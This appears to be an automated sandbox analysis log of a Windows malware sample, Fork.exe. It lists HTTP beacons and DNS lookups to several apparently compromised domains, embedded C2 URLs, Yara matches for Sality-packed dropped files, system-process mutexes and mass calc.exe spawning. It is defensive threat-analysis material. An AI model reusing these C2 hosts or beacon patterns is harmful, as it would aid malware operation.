      Source: global trafficHTTP traffic detected: GET /logo.gif?1308dd2=179633250 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162674|1742162671|1|2|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?175d7eb=196001624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162676|1742162670|2|3|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?18828d2=179903934 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162677|1742162671|2|3|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?1e72e91=159639765 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162679|1742162670|2|4|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?2063744=237732572 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162680|1742162671|2|4|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?263b431=280620375 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162682|1742162670|2|5|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?282bcc5=294857059 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162683|1742162671|2|5|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?2f2bdaf=494627030 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162684|1742162670|2|6|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?3115e42=514698900 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162685|1742162671|2|6|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?3925b70=239693248 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162686|1742162670|2|7|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?3db8193=582454827 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162687|1742162671|2|7|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?47a8101=225411843 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162690|1742162670|3|8|0; snkz=8.46.123.189
      Source: global trafficDNS traffic detected: DNS query: businecessity.com
      Source: global trafficDNS traffic detected: DNS query: al-somow.com
      Source: global trafficDNS traffic detected: DNS query: amnisure.com.tr
      Source: global trafficDNS traffic detected: DNS query: bhagavatirannade.org
      Source: global trafficDNS traffic detected: DNS query: ankara-cambalkon.net
      Source: global trafficDNS traffic detected: DNS query: aocuoikhanhlinh.vn
      Source: global trafficDNS traffic detected: DNS query: yeni.antalyahilal.com
      Source: global trafficDNS traffic detected: DNS query: arimaexim.com
      Source: global trafficDNS traffic detected: DNS query: c.pki.goog
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abb.ind.in/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abb.ind.in/logo.gifhttp://www.akpartisariveliler.com/images/img.gif4j14/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://al-somow.com/images/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amnisure.com.tr/images/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ankara-cambalkon.net/images/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aocuoikhanhlinh.vn/images/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arimaexim.com/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bhagavatirannade.org/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://businecessity.com/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://businecessity.com/logo.gifhttp://al-somow.com/images/logo.gifhttp://amnisure.com.tr/images/lo
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.akpartisariveliler.com/images/img.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yeni.antalyahilal.com/logo.gif

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: C:\Users\user\AppData\Local\Temp\winrhbwc.exe, type: DROPPEDMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
      Source: C:\doxt.pif, type: DROPPEDMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
      PE file has a writeable .text section
      Source: winrhbwc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: doxt.pif.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Fork.exe, 00000000.00000000.963609984.0000000000418000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFORKBOMB.exe2 vs Fork.exe
      Source: Fork.exeBinary or memory string: OriginalFilenameFORKBOMB.exe2 vs Fork.exe
      Source: Fork.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Users\user\AppData\Local\Temp\winrhbwc.exe, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
      Source: C:\doxt.pif, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
      Source: winrhbwc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: doxt.pif.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: doxt.pif.0.drStatic PE information: Section .text
      Source: winrhbwc.exe.0.drStatic PE information: Section .text
      Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@149/5@30/2
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_908_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_548_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\registryM_92_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_488_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\smss.exeM_324_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\services.exeM_616_
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_764_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_768_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_736_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_404_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_980_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_856_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_480_
      Source: C:\Users\user\Desktop\Fork.exeMutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_624_
      Source: C:\Users\user\Desktop\Fork.exeFile created: C:\Users\user\AppData\Local\Temp\6028.tmpJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe"
      Source: C:\Users\user\Desktop\Fork.exeFile read: C:\Windows\system.iniJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Fork.exeVirustotal: Detection: 85%
      Source: Fork.exeReversingLabs: Detection: 97%
      Source: unknownProcess created: C:\Users\user\Desktop\Fork.exe "C:\Users\user\Desktop\Fork.exe"
      Source: C:\Users\user\Desktop\Fork.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Users\user\Desktop\Fork.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: version.dllJump to behavior
